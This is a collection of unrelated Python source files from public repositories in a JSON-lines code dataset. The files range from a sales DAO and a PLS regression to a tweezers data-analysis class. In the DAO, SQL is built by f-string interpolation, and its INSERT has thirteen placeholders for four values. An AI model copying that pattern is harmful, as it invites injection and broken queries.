\"TEST_MODE_NONE\" :\n time.sleep(10) # sleep 10 seconds, wait the step motor noise to fade out.\n \n # same level as \"for microphoneIterationNo in range(maxNumberOfMicrophoneIteration)\" above.\n\n moveMicophoneStepMotor(microphoneIterationNo,TEST_MODE)\n #resetSpeakerStepMotor(TEST_MODE)\n logger.info(\">>>> Sleep 10 seconds , Wait the step motor noise to fade out...\")\n if TEST_MODE == \"TEST_MODE_NONE\" :\n time.sleep(10) # sleep 10 seconds, wait the step motor noise to fade out.\n else :\n time.sleep(1) # sleep 10 seconds, wait the step motor noise to fade out.\n \n\n\nif __name__ == '__main__':\n main()\n\n\n\n\n\n \n","repo_name":"mehmetpekmezci/gtu-rir","sub_path":"01.data_collection/02.recording_data/02.data_recording/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":22271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"18043344795","text":"from src.data.dao.abstract_dao import AbstractDAO\nfrom src.data.dao.produto_dao import ProdutoDAO\nfrom src.data.database.database import Database\nfrom src.domain.models.venda_produtos import VendaProduto\n\n\nclass VendasProdutoDAO(AbstractDAO):\n def __init__(self, database: Database) -> None:\n super().__init__(database, 'vendas_produtos')\n self.__database = database\n self.__schema = super().schema\n self.__table = super().table\n\n @staticmethod\n def __get_columns_joined():\n return ', '.join([\n 'vp.id AS venda_produto_id', 'vp.id_venda', 'vp.id_produto', 'vp.quantidade',\n 'p.id', 'p.id_tipo_produto', 'p.titulo', 'p.descricao', 'p.custo', 'p.margem_lucro',\n 'p.fabricante',\n 'p.autor', 'p.edicao', 'p.editora', 'p.isbn', 'p.pais', 'p.desconto'\n ])\n\n def execute_query(self, query: str):\n super().execute_query(query)\n\n def get_all(self, custom_query=\"\") -> [VendaProduto]:\n table = super().get_table()\n columns = VendasProdutoDAO.__get_columns_joined()\n\n custom_query = f\"\"\"\n SELECT {columns} FROM {table} vp\n INNER JOIN book_pdv.produtos p\n ON vp.id_produto = p.id\n \"\"\"\n\n rows = super().get_all(custom_query)\n\n venda_produtos = list(map(lambda row: VendasProdutoDAO.__parse_venda_produto(row), rows))\n\n return venda_produtos\n\n def get_by_id(self, id_venda_produto: int) -> VendaProduto | None:\n table = super().get_table()\n columns = VendasProdutoDAO.__get_columns_joined()\n\n custom_query = f\"\"\"\n SELECT {columns} FROM {table} vp\n INNER JOIN book_pdv.produtos p\n ON vp.id_produto = p.id\n WHERE venda_produto_id = {id_venda_produto}\n \"\"\"\n\n row = super().get_by_pk(\"id\", id_venda_produto, custom_query)\n\n 
venda_produto = None if row is None else VendasProdutoDAO.__parse_venda_produto(row)\n return venda_produto\n\n def persist_entity(self, venda_produto: VendaProduto) -> None:\n table = super().get_table()\n columns = \"id, id_venda, id_produto, quantidade\"\n\n super().persist(\n f\"\"\" INSERT INTO {table} ({columns}) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\"\",\n (\n venda_produto.id,\n venda_produto.id_venda,\n venda_produto.produto.id,\n venda_produto.quantidade\n ),\n )\n\n def delete_entity(self, id_venda_produto: int) -> None:\n super().delete(\"id\", id_venda_produto)\n\n def update_entity(self, id_venda_produto: int, attribute, value) -> None:\n super().update(\"id\", id_venda_produto, attribute, value)\n\n @staticmethod\n def __parse_venda_produto(row: dict):\n id = row['venda_produto_id']\n id_venda = row['id_venda']\n\n produto = ProdutoDAO.parse_produto(row)\n\n quantidade = row['quantidade']\n\n return VendaProduto(\n id,\n id_venda,\n produto,\n quantidade\n )\n","repo_name":"Franco904/book-pdv","sub_path":"src/data/dao/vendas_produtos_dao.py","file_name":"vendas_produtos_dao.py","file_ext":"py","file_size_in_byte":3228,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"40303191641","text":"import pandas as pd\nfrom utils.textprocessing import transform_original_dataframe\n\ndef load_data(transform_data=True):\n # read raw data from csv file\n train_df = pd.read_csv('drive/kaikeba/Abstract/data/AutoMaster_TrainSet.csv', encoding='utf-8')\n test_df = pd.read_csv('drive/kaikeba/Abstract/data/AutoMaster_TestSet.csv', encoding='utf-8')\n\n # remove rows contain na\n train_df = train_df.dropna()\n test_df = test_df.dropna()\n\n # merge question column and dialog column\n if transform_data:\n trans_train_df = transform_original_dataframe(train_df)\n trans_test_df = transform_original_dataframe(test_df)\n else:\n trans_train_df = train_df\n trans_test_df = test_df\n\n train_question_list = trans_train_df['Question'].tolist()\n train_dialog_list = trans_train_df['Dialogue'].tolist()\n train_report_list = trans_train_df['Report'].tolist()\n\n test_question_list = trans_test_df['Question'].tolist()\n test_dialog_list = trans_test_df['Dialogue'].tolist()\n\n train_X = []\n train_Y = train_report_list\n for i, question in enumerate(train_question_list):\n curr_train = question + ' ' + train_dialog_list[i]\n curr_train = curr_train.replace('', '').replace('', '').strip()\n train_X.append(curr_train)\n\n test_X = []\n for i, question in enumerate(test_question_list):\n curr_test = question + ' ' + test_dialog_list[i]\n curr_test = curr_test.replace('', '').replace('', '').strip()\n test_X.append(curr_test)\n\n return train_X, train_Y, test_X\n\n\nif __name__ == '__main__':\n train_X, train_Y, test_X = load_data()\n","repo_name":"NekoPunchMoe/QA-summary-and-reasoning","sub_path":"utils/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"23"} +{"seq_id":"3108010278","text":"# Author : Hyunwoong\n# When : 6/19/2019\n# Homepage : github.com/gusdnd852\n\nimport operator\n\nimport cv2\nimport numpy as np\nfrom sklearn.cluster import KMeans\n\n\nclass ColorExtractor:\n def centroid_histogram(self, clt):\n numLabels = np.arange(0, len(np.unique(clt.labels_)) + 1)\n (hist, _) = np.histogram(clt.labels_, bins=numLabels)\n hist = hist.astype(\"float\")\n hist /= hist.sum()\n return hist\n\n 
def plot_colors(self, hist, centroids):\n bar = np.zeros((50, 300, 3), dtype=\"uint8\")\n startX = 0\n percent_arr = {}\n\n for (percent, color) in zip(hist, centroids):\n percent_arr[str(percent)] = color\n\n percent_arr = sorted(percent_arr.items(), key=operator.itemgetter(0))\n percent_arr.reverse()\n\n for (percent, color) in zip(hist, centroids):\n endX = startX + (percent * 300)\n cv2.rectangle(bar, (int(startX), 0), (int(endX), 50),\n color.astype(\"uint8\").tolist(), -1)\n startX = endX\n return bar, percent_arr\n\n def image_color_cluster(self, image_path, k=3):\n image = cv2.imread(image_path)\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n image = image.reshape((image.shape[0] * image.shape[1], 3))\n\n clt = KMeans(n_clusters=k)\n clt.fit(image)\n\n hist = self.centroid_histogram(clt)\n bar, p_arr = self.plot_colors(hist, clt.cluster_centers_)\n return p_arr\n\n def get_color(self, file_name, k=3):\n col = self.image_color_cluster(file_name, k)\n return col\n","repo_name":"hyunwoongko/social-robot-bao","sub_path":"python/painter/grayscale/color_extractor.py","file_name":"color_extractor.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"23"} +{"seq_id":"72009603580","text":"#!/usr/bin/python3\n\"\"\"\nThis Python script accepts a URL as a command-line argument,\nsends an HTTP request to the URL,\nand then extracts and displays the value of the 'X-Request-Id'\nfield from the response headers.\n\"\"\"\n\nimport requests\nfrom sys import argv\n\nif __name__ == '__main__':\n # Ensure the script is executed as the main program\n if len(argv) != 2:\n print(\"Usage: python script.py \")\n else:\n # Retrieve the URL from the command-line argument\n url = argv[1]\n\n # Send an HTTP GET request to the specified URL\n response = requests.get(url)\n\n x_request_id = response.headers.get('X-Request-Id')\n if x_request_id:\n print(f\"X-Request-Id: {x_request_id}\")\n","repo_name":"JordansFamiliar/alx-higher_level_programming","sub_path":"0x11-python-network_1/5-hbtn_header.py","file_name":"5-hbtn_header.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"74224391098","text":"VERSION = \"1.5.1dev\"\n\n# The choices for the Trove Development Status line:\n# Development Status :: 5 - Production/Stable\n# Development Status :: 4 - Beta\n# Development Status :: 3 - Alpha\n\nclassifiers = \"\"\"\\\nIntended Audience :: Developers\nLicense :: OSI Approved :: Zope Public License\nProgramming Language :: Python\nTopic :: Database\nTopic :: Software Development :: Libraries :: Python Modules\nOperating System :: Microsoft :: Windows\nOperating System :: Unix\n\"\"\"\n\nimport os\nfrom setuptools import setup\n\ndoclines = __doc__.split(\"\\n\")\n\ndef read_file(*path):\n base_dir = os.path.dirname(__file__)\n file_path = (base_dir, ) + tuple(path)\n return file(os.path.join(*file_path)).read()\n\nsetup(\n name=\"RelStorage\",\n version=VERSION,\n author=\"Zope Foundation and Contributors\",\n maintainer=\"Shane Hathaway\",\n maintainer_email=\"shane@hathawaymix.org\",\n url=\"http://pypi.python.org/pypi/RelStorage\",\n packages=[\n 'relstorage',\n 'relstorage.adapters',\n 'relstorage.adapters.tests',\n 'relstorage.tests',\n 'relstorage.tests.blob',\n ],\n package_data={\n 'relstorage': ['component.xml'],\n },\n license=\"ZPL 2.1\",\n platforms=[\"any\"],\n description=doclines[0],\n classifiers=filter(None, 
classifiers.split(\"\\n\")),\n long_description = (\n read_file(\"README.txt\") + \"\\n\\n\" +\n \"Change History\\n\" +\n \"==============\\n\\n\" +\n read_file(\"CHANGES.txt\")),\n zip_safe=False, # otherwise ZConfig can't see component.xml\n install_requires=[\n 'ZODB3>=3.7.0',\n 'zope.interface',\n 'zc.lockfile',\n ],\n extras_require={\n 'mysql': ['MySQL-python>=1.2.2'],\n 'postgresql': ['psycopg2>=2.0'],\n 'oracle': ['cx_Oracle>=4.3.1'],\n },\n entry_points = {'console_scripts': [\n 'zodbconvert = relstorage.zodbconvert:main',\n 'zodbpack = relstorage.zodbpack:main',\n ]},\n test_suite='relstorage.tests.alltests.make_suite',\n)\n","repo_name":"cjw296/relstorage","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"23"} +{"seq_id":"43333043716","text":"# This file is part of sbi, a toolkit for simulation-based inference. sbi is licensed\n# under the Affero General Public License v3, see .\n\nfrom abc import ABC, abstractmethod\nfrom typing import Any, Dict, Optional, Tuple\n\nimport numpy as np\nimport torch\nfrom torch import Tensor\nfrom torch import nn\n\nfrom sbi import utils as utils\nfrom sbi.user_input.user_input_checks import process_x\nfrom sbi.utils.torchutils import (\n atleast_2d_float32_tensor,\n ensure_theta_batched,\n)\n\n\nclass NeuralPosterior(ABC):\n r\"\"\"Posterior $p(\\theta|x)$ with `log_prob()` and `sample()` methods.
\n All inference methods in sbi train a neural network which is then used to obtain\n the posterior distribution. The `NeuralPosterior` class wraps the trained network\n such that one can directly evaluate the (unnormalized) log probability and draw\n samples from the posterior. The neural network itself can be accessed via the `.net`\n attribute.\n \"\"\"\n\n def __init__(\n self, method_family: str, neural_net: nn.Module, prior, x_shape: torch.Size, device: str = \"cpu\",\n ):\n \"\"\"\n Args:\n method_family: One of snpe, snl, snre_a or snre_b.\n neural_net: A classifier for SNRE, a density estimator for SNPE and SNL.\n prior: Prior distribution with `.log_prob()` and `.sample()`.\n x_shape: Shape of a single simulator output.\n device: Training device, e.g., cpu or cuda.\n \"\"\"\n if method_family in (\"snpe\", \"snle\", \"snre_a\", \"snre_b\"):\n self._method_family = method_family\n else:\n raise ValueError(\"Method family unsupported.\")\n\n self.net = neural_net\n self.device = device\n self.prior = prior\n\n @abstractmethod\n def log_prob(self, theta: Tensor, x: Optional[Tensor] = None, track_gradients: bool = False,) -> Tensor:\n \"\"\"See child classes for docstring.\"\"\"\n pass\n\n def _prepare_theta_and_x_for_log_prob_(self, theta: Tensor, x: Optional[Tensor] = None,) -> Tuple[Tensor, Tensor]:\n r\"\"\"Returns $\\theta$ and $x$ in shape that can be used by posterior.log_prob().\n\n Checks shapes of $\\theta$ and $x$ and then repeats $x$ as often as there were\n batch elements in $\\theta$.\n\n Args:\n theta: Parameters $\\theta$.\n x: Conditioning context for posterior $p(\\theta|x)$. If not provided, fall\n back onto an `x_o` if previously provided for multi-round training, or\n to another default if set later for convenience, see `.set_default_x()`.\n\n Returns:\n ($\\theta$, $x$) with the same batch dimension, where $x$ is repeated as\n often as there were batch elements in $\\theta$ originally.\n \"\"\"\n\n theta = ensure_theta_batched(torch.as_tensor(theta))\n\n # Select and check x to condition on.\n x = atleast_2d_float32_tensor(self._x_else_default_x(x))\n self._ensure_single_x(x)\n self._ensure_x_consistent_with_default_x(x)\n\n # Repeat `x` in case of evaluation on multiple `theta`. 
This is needed below in\n # when calling nflows in order to have matching shapes of theta and context x\n # at neural network evaluation time.\n x = self._match_x_with_theta_batch_shape(x, theta)\n\n return theta, x\n","repo_name":"smsharma/neural-global-astrometry","sub_path":"sbi/inference/posteriors/base_posterior.py","file_name":"base_posterior.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"23"} +{"seq_id":"33414354588","text":"\"\"\"\nTitle: AoiHasuChat\nAuthor: [Guido Marinelli](https://github.com/GuidoMarinelli/)\nDate created: 2023/11/01\nLast modified: 2023/11/08\nDescription: Use Panel in creating a simple Chat app.\n\"\"\"\n\nimport panel as pn\n\nfrom langchain.chains import LLMChain\nfrom langchain.llms import CTransformers\nfrom langchain.prompts import PromptTemplate\nfrom langchain.memory import ConversationBufferMemory\n\npn.extension(theme='dark')\n\nMODEL_PATH = \"./meta_models/llama-2-7b-chat/ggml-model-q4_k_m.gguf\"\n\nTEMPLATE = \"\"\"[INST] You are a friendly chat bot named Blue who's willing to help answer the user:\n\n{chat_history}\nHuman: {human_input}\nAI: [/INST] \n\"\"\"\n\nCONFIG = {\"temperature\": 0.5, \"max_new_tokens\": 256, \"context_length\": 2048, \"stream\": True}\n\nmemory = ConversationBufferMemory(memory_key=\"chat_history\")\n\n\nasync def callback(contents: str, user: str, instance: pn.chat.ChatInterface):\n prompt = PromptTemplate(\n template=TEMPLATE, input_variables=[\"chat_history\", \"human_input\"]\n )\n\n llm = CTransformers(model=MODEL_PATH, model_type=\"llama2\", config=CONFIG, gpu_layers=1)\n\n llm_chain = LLMChain(llm=llm,\n prompt=prompt,\n memory=memory,\n )\n message = None\n response = await llm_chain.apredict(human_input=contents)\n for chunk in response:\n message = instance.stream(chunk, user=\"Blue\", message=message, avatar=\"https://upload.wikimedia.org/wikipedia/commons/thumb/0/04/ChatGPT_logo.svg/1024px-ChatGPT_logo.svg.png?20230318122128\")\n\n\nchat_interface = pn.chat.ChatInterface(callback=callback, placeholder_threshold=0.1)\nchat_interface.send(\n \"Send a message to get a reply from Llama 2!\",\n user=\"System\",\n respond=False,\n)\nchat_interface.servable()\n","repo_name":"GuidoMarinelli/AoiHasuAI","sub_path":"AoiHasuChat-Panel/AoiHasuChat.py","file_name":"AoiHasuChat.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"22116935713","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jul 19 12:28:47 2020\n\n@author: Tamás Baráth\n\"\"\"\nimport numpy as np\nimport scipy as sp\n\nclass PLSRegression:\n #PLS with SIMPLS algo as I dont trust scikit-learn\n def __init__(self,n_components,P=None,scale=False):\n self.n_components = n_components\n self.P=P\n \n def fit(self,X,Y):\n assert Y.ndim == 2, 'Y needs to be a 2D array. 
if there is only one column, make sure it is of shape (n,1)'\n\n n_components=self.n_components\n P=self.P\n \n N = X.shape[0]\n K = X.shape[1]\n q = Y.shape[1]\n \n if P is None:\n P = np.identity(n = N) / N\n \n mu_x = ((P.dot(X)).sum(axis=0))/ P.sum()\n mu_y = ((P.dot(Y)).sum(axis=0))/ P.sum()\n \n \n Xc = X - mu_x\n Yc = Y - mu_y\n self.mu_x=mu_x\n self.mu_y=mu_y\n \n \n R = np.zeros((K, n_components)) # Weights to get T components\n V = np.zeros((K, n_components)) # orthonormal base for X loadings\n S = Xc.T.dot(P).dot(Yc) # cov matrix\n \n aa = 0\n\n while aa < n_components:\n \n r = S[:,:] \n \n if q > 1:\n \n U, sval, V = sp.linalg.svd(S, full_matrices=True, compute_uv=True) \n r = U[:, 0]\n \n \n t = Xc.dot(r)\n t.shape = (N, 1)\n t = t - ((P.dot(t)).sum(axis=0)/ P.sum())\n T_scale = np.sqrt(t.T.dot(P).dot(t))\n # Normalize\n t = t / T_scale \n r = r / T_scale\n r.shape = (K, 1)\n p = Xc.T.dot(P).dot(t)\n v = p\n v.shape = (K, 1)\n \n if aa > 0:\n v = v - V.dot(V.T.dot(p))\n \n v = v / np.sqrt(v.T.dot(v))\n S = S - v.dot(v.T.dot(S))\n \n R[:, aa] = r[:, 0]\n V[:, aa] = v[:, 0]\n \n aa += 1\n \n T = Xc.dot(R)\n \n tcal_raw0 = np.concatenate((np.ones((X.shape[0], 1)), T), axis=1)\n wtemp = np.linalg.solve(tcal_raw0.T.dot(P.dot(tcal_raw0)), tcal_raw0.T.dot(P.dot(Y))) \n \n self.R=R \n self.b = wtemp[0,0] \n self.BPLS = R.dot(wtemp[1:, :])\n \n def predict(self, X):\n\n Ypred = self.mu_y + (X - self.mu_x).dot(self.BPLS)\n\n return Ypred\n \n \n \n ","repo_name":"BarathTamas/NIR-Thesis-Public","sub_path":"pls.py","file_name":"pls.py","file_ext":"py","file_size_in_byte":2414,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"23"} +{"seq_id":"7232562979","text":"# Exercise 2 - Steven Sousa 10-15-2020\n\nimport turtle\n\nbreski = turtle.Turtle()\nwn = turtle.Screen()\nbreski.pensize(4)\nsz = 20\n\ndef drawsquare(t, sz):\n for a in range(4):\n breski.forward(sz)\n breski.left(90)\n\n\nfor b in range(5):\n drawsquare(breski, sz) # Calls function\n breski.penup() # lifts pen\n breski.setx(breski.xcor()-10) # moves breski back in the xy plane by -10 units\n breski.sety(breski.ycor()-10) # moves breski down in the xy plane by -10 units\n breski.pendown() # lowers pen\n sz = sz + 20 # increases size the size of the square in each iteration\n\nwn.exitonclick()\n","repo_name":"Stevensousa67/CSC105","sub_path":"Textbook_Exercises/Chapter 6/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"31104661402","text":"import copy\nimport logging as log\nfrom collections import OrderedDict\nimport pandas as pd\nimport numpy as np\n\nfrom tweezers.container.TweezersAnalysis import TweezersAnalysis\nfrom tweezers.ixo.collections import IndexedOrderedDict\nfrom tweezers.ixo.decorators import lazy\nfrom tweezers.ixo.statistics import averageData\nfrom tweezers.meta import MetaDict, UnitDict\nfrom tweezers.plot.psd import PsdFitPlot\nfrom tweezers.plot.utils import peekPlot\nimport tweezers.calibration.psd as psd\nimport tweezers.calibration.thermal as thermal\nfrom tweezers.physics.tweezers import tcOsciHydroCorrect\n\n\nclass TweezersDataBase:\n \"\"\"\n Base class for storing tweezers data. 
This class should implement methods and attributes that both,\n the :class:`.TweezersData` and the :class:`.TweezersDataSegment` require.\n\n The following attributes are populated lazily on the first call.\n\n Attributes:\n meta (:class:`.MetaDict`): metadata of the experiment\n units (:class:`.UnitDict`): units of the metadata\n psd (:class:`pandas.DataFrame`): power spectrum data\n psdFit (:class:`pandas.DataFrame`): power spectrum fit data\n ts (:class:`pandas.DataFrame`): time series for thermal calibration\n \"\"\"\n\n @lazy\n def meta(self):\n \"\"\"\n Attribute that holds the metadata of the experiment. It is evaluated lazily thus the metadata is read only\n when required.\n\n Returns:\n :class:`.MetaDict`\n \"\"\"\n\n log.debug('Reading metadata from data source.')\n meta, units = self.source.getMetadata()\n self.units = units\n return meta\n\n @lazy\n def units(self):\n \"\"\"\n Attribute that holds the units to the corresponding meta data. This should be returned by the data source's\n ``getMetadata`` method as well. Evaluated lazily.\n\n Returns:\n :class:`.UnitDict`\n \"\"\"\n\n meta, units = self.source.getMetadata()\n self.meta = meta\n return units\n\n @lazy\n def ts(self):\n \"\"\"\n Attribute to hold the time series used for the thermal calibration. Evaluated lazily.\n\n Returns:\n :class:`pandas.DataFrame`\n \"\"\"\n\n log.debug('Reading timeseries from data source.')\n return self.source.getTs()\n\n @lazy\n def psd(self):\n \"\"\"\n Attribute to hold the power spectrum density. If called before :meth:`.computePsd`,\n it holds the PSD from the data source, otherwise the newly computed one.\n \"\"\"\n\n log.debug('Reading PSD from data source.')\n return self.source.getPsd()\n\n @property\n def avData(self):\n \"\"\"\n Attribute to return the default downsampled and averaged data. Evaluated each time the\n attribute is called.\n \"\"\"\n\n return self.averageData(nsamples=10)\n\n def averageData(self, nsamples=10):\n \"\"\"\n Downsample the data by averaging ``nsamples``.\n\n Args:\n nsamples (`int`): number of samples to average\n\n Returns:\n :class:`pandas.DataFrame`\n \"\"\"\n\n return averageData(self.data, nsamples=nsamples)\n\n def computePsd(self, **kwargs):\n \"\"\"\n Compute the power spectrum density from the experiments time series which is stored in the ``ts`` attribute.\n All arguments are forwarded to :class:`.PsdComputation`.\n This method returns a copy of the initial :class:`.TweezersData` object to prevent e.g. 
overwriting of\n data that was read from files.\n\n Returns:\n :class:`.TweezersData`\n \"\"\"\n\n # use the timeseries sampling rate as default if none is given as user input (in kwargs)\n args = {'samplingRate': self.meta['psdSamplingRate']}\n args.update(kwargs)\n\n # create copy\n t = self.copy()\n\n data = {}\n cols = ['f']\n # compute PSD for each trap\n for trap in t.meta.traps:\n psdTrap = psd.computePsd(t.ts[trap], **kwargs)[0]\n data[trap] = psdTrap['psdMean']\n data[trap + 'Std'] = psdTrap['psdStd']\n cols += [trap, trap + 'Std']\n data['f'] = psdTrap['f']\n\n # store PSD\n t.psd = pd.DataFrame(data, columns=cols)\n # store PSD metadata\n t.meta['psdBlockLength'] = psdTrap['blockLength']\n t.meta['psdNBlocks'] = psdTrap['nBlocks']\n t.meta['psdOverlap'] = psdTrap['overlap']\n\n # store PSD units\n t.units['psd'] = t.units['timeseries'] + '^2/Hz'\n\n # delete PSD fit and thermal calibration data if present to prevent confusion with newly computed PSD and old fits\n t.psdFit = None\n t.meta.deleteKey('diffusionCoefficient', 'cornerFrequency', 'psdFitError', 'psdFitR2', 'psdFitChi2',\n 'displacementSensitivity', 'forceSensitivity', 'stiffness')\n t.units.deleteKey('diffusionCoefficient', 'cornerFrequency', 'psdFitError', 'psdFitR2', 'psdFitChi2',\n 'displacementSensitivity', 'forceSensitivity', 'stiffness')\n\n return t\n\n @lazy\n def psdFit(self):\n \"\"\"\n Attribute to hold the Lorentzian fit to the power spectrum density. If called before\n :meth:`.fit_psd`, it holds the fit from the data source, otherwise the newly computed one.\n \"\"\"\n\n log.debug('Reading PSD fit from data source.')\n return self.source.getPsdFit()\n\n def fitPsd(self, **kwargs):\n \"\"\"\n Fits the PSD. All input is forwarded to the :class:`.PsdFit` object.\n This method returns a copy of the initial :class:`.TweezersData` object to prevent e.g. overwriting of\n data that was read from files.\n\n Returns:\n :class:`.TweezersData`\n \"\"\"\n\n # create copy that will be returned\n t = self.copy()\n\n data = {}\n cols = ['f'] + t.meta.traps\n # fit PSD for each trap\n for trap in t.meta.traps:\n # check for oscillation calibration to exclude peak from fitting\n peakF = 0\n if t.meta.psdType == 'oscillation':\n peakF = t.meta.psdOscillateFrequency\n # fit psd\n fitTrap = psd.PsdFit(t.psd.f, t.psd[trap], std=t.psd[trap + 'Std'], peakF=peakF, **kwargs)\n # store fit function data\n data[trap] = fitTrap.yFitFull\n # store fit result parameters\n t.meta[trap].update(fitTrap.fitresAsMeta())\n data['f'] = fitTrap.fFull\n\n # store PSD fit\n t.psdFit = pd.DataFrame(data, columns=cols)\n # store extra metadata\n t.meta['psdFitMinF'] = data['f'].iloc[0]\n t.meta['psdFitMaxF'] = data['f'].iloc[-1]\n\n return t\n\n def thermalCalibration(self):\n \"\"\"\n Perform a thermal calibration. 
Requires :meth:`.psd` and\n :meth:`.psdFit`.\n Returns a copy of the initial object.\n\n Returns:\n :class:`.TweezersData`\n \"\"\"\n\n t = self.copy()\n\n # sort traps such that y-traps are calibrated first, required for oscillation calibration (gets dragCoef from\n # y and uses that for x\n trapsSorted = sorted(t.meta.traps, key=lambda s: s[-1], reverse=True)\n for trap in trapsSorted:\n thermal.doThermalCalib(t, trap)\n\n # recompute forces\n t.meta, t.units, t.data = t.source.calculateForce(t.meta, t.units, t.data)\n\n return t\n\n def osciHydroCorr(self):\n \"\"\"\n Correct results of thermal calibration performed with oscillation technique.\n\n Returns a copy of the initial object.\n\n Returns:\n :class:`.TweezersData`\n \"\"\"\n\n t = self.copy()\n m = t.meta\n # radii in nm\n rPm = m.pmY.beadDiameter / 2 * 1000\n rAod = m.aodY.beadDiameter / 2 * 1000\n\n # get y distance\n dy = np.abs(m.pmY.trapPosition - m.aodY.trapPosition)\n\n # todo correct x-axis parameters?\n # go through y-traps\n for trap in m.traps:\n if not trap.lower().endswith('y'):\n continue\n # the radius in the equation is that of the other bead (that causes the flow field)\n [rTrap, rOther] = [rPm, rAod] if trap.lower().startswith('pm') else [rAod, rPm]\n # get correction factor\n c = tcOsciHydroCorrect(dy, rTrap=rTrap, rOther=rOther, method='oseen')\n # store correction factor\n m[trap]['hydroCorr'] = c\n # also store for x-trap\n xTrap = trap[:-1] + 'X'\n m[xTrap]['hydroCorr'] = c\n\n # correct the calibration parameters\n for trap in m.traps:\n c = m[trap].hydroCorr\n m[trap].displacementSensitivity *= c\n m[trap].stiffness /= c ** 2\n m[trap].forceSensitivity /= c\n\n # recompute data\n t.meta, t.units, t.data = t.source.postprocessData(m, t.units, t.data)\n\n return t\n\n def copy(self):\n \"\"\"\n Returns a deep copy of the object\n\n Args:\n\n\n Returns:\n :class:`.TweezersDataBase`\n \"\"\"\n\n return copy.deepcopy(self)\n\n def getFacets(self, data, colName='Value', meta=[]):\n \"\"\"\n Returns a :class:`pandas.DataFrame` suitable for a :class:`seaborn.FacetGrid`, i.e. 
the axis of a value is\n specified in an extra column instead of having one column per axis.\n\n Args:\n data (:class:`pandas.DataFrame`): input data\n colName (`str`): column name of the \"value\" column\n meta (`list` of `str`): list of strings, the metadata is searched for these keys and they are added as\n additional columns if available\n\n Returns:\n :class:`pandas.DataFrame`\n \"\"\"\n\n # in case we have frequency or time data, keep that as index\n index = []\n if 'f' in data.columns:\n index = ['f']\n elif 't' in data.columns:\n index = ['t']\n\n resDf = pd.DataFrame()\n for col in data.columns:\n # skip index columns\n if col in index:\n continue\n\n tmpDf = data[index + [col]].rename(columns={col: colName})\n tmpDf.loc[:, 'Axis'] = col\n\n for m in meta:\n if m in self.meta[col].keys():\n tmpDf.loc[:, m] = self.meta[col][m]\n resDf = resDf.append(tmpDf)\n\n for m in meta:\n if m in self.meta.keys():\n resDf.loc[:, m] = self.meta[m]\n\n return resDf\n\n def peek(self, *cols):\n \"\"\"\n Show a :func:`.peekPlot` of the current data.\n\n Args:\n *cols: see :func:`.peekPlot`\n\n Returns:\n :class:`.TweezersData`\n \"\"\"\n\n peekPlot(self, *cols)\n return self\n\n def peekPsd(self):\n \"\"\"\n Plots the PSD, see :class:`.PsdFitPlot`\n\n Returns:\n :class:`.TweezersData`\n \"\"\"\n\n PsdFitPlot(self, residuals=False)\n return self\n\n def getAnalysis(self, name=None):\n \"\"\"\n Convert the current :class:`.TweezersData` to a :class:`.TweezersAnalysis`, the general format to store and\n exchange analysis results.\n\n Args:\n name (`str`, optional): name for the analysis file, constructed from metadata if not given (using the ID)\n\n Returns:\n :class:`.TweezersAnalysis`\n \"\"\"\n\n analysis = self.getEmptyAnalysis(name=name)\n analysis.data = copy.deepcopy(self.data)\n return analysis\n\n def getSegmentAnalysis(self, name=None):\n \"\"\"\n Convert all segments of the current :class:`.TweezersData` to a :class:`.TweezersAnalysis`, the general\n format to store and exchange analysis results.\n\n Args:\n name (`str`, optional): name for the analysis file, constructed from metadata if not given (using the ID)\n\n Returns:\n :class:`.TweezersAnalysis` or `None` if no segments are defined\n \"\"\"\n\n # if there are no segments, ignore this dataset\n if not self.segments:\n return None\n\n analysis = self.getEmptyAnalysis(name=name)\n analysis.addField('segments')\n for key in self.segments.keys():\n seg = self.getSegment(key)\n analysis.segments[key] = IndexedOrderedDict(data=seg.data, id=seg.meta.id, idSafe=seg.meta.idSafe)\n return analysis\n\n def getEmptyAnalysis(self, name=None):\n \"\"\"\n Shared code that prepares export of an analysis file, used by :meth:`.getAnalysis` and\n :meth:`.getSegmentAnalysis`.\n\n Args:\n name: see :meth:`.getAnalysis`\n\n Returns:\n :class:`.TweezersAnalysis`\n \"\"\"\n\n if not name:\n name = self.meta.id\n name = TweezersAnalysis.getFilename(name)\n\n analysis = TweezersAnalysis(name=name)\n analysis.meta = copy.deepcopy(self.meta)\n analysis.units = copy.deepcopy(self.units)\n analysis.meta['sourceClass'] = self.source.__class__.__name__\n return analysis\n\n\nclass TweezersData(TweezersDataBase):\n \"\"\"\n TweezersData structure for tweezers experiment data and metadata. It requires a data source object that\n implements the methods of :class:`.BaseSource` to populate its properties.\n Note that not all of these methods must be implemented, depending of your usage of the class. 
